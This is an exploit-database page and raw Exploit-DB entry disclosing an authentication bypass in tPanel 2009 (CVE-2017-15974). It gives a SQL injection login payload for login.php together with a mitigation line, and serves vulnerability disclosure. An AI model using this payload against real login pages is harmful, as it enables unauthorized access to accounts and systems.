header-logo
Suggest Exploit
vendor:
tPanel
by:
Ihsan Sencan
9,8
CVSS
CRITICAL
Authentication Bypass
287
CWE
Product Name: tPanel
Affected Version From: 2009
Affected Version To: 2009
Patch Exists: YES
Related CWE: CVE-2017-15974
CPE: a:datacomponents:tpanel:2009
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2017

tPanel 2009 – Authentication Bypass

The vulnerability allows an attacker to inject sql commands. An attacker can bypass authentication by sending a crafted request with 'or 1=1 or ''=' as the username and anything as the password.

Mitigation:

Ensure that authentication credentials are properly validated and sanitized before being used in a SQL query.
Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: tPanel 2009 - Authentication Bypass 
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.datacomponents.net/
# Software Link: http://www.datacomponents.net/products/hosting/tpanel/
# Demo: http://demo.datacomponents.net/tpanel/
# Version: 2009
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15974
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 
# http://localhost/[PATH]/login.php
# 
# User: 'or 1=1 or ''=' Pass: anything
# 
# Etc..
# # # # #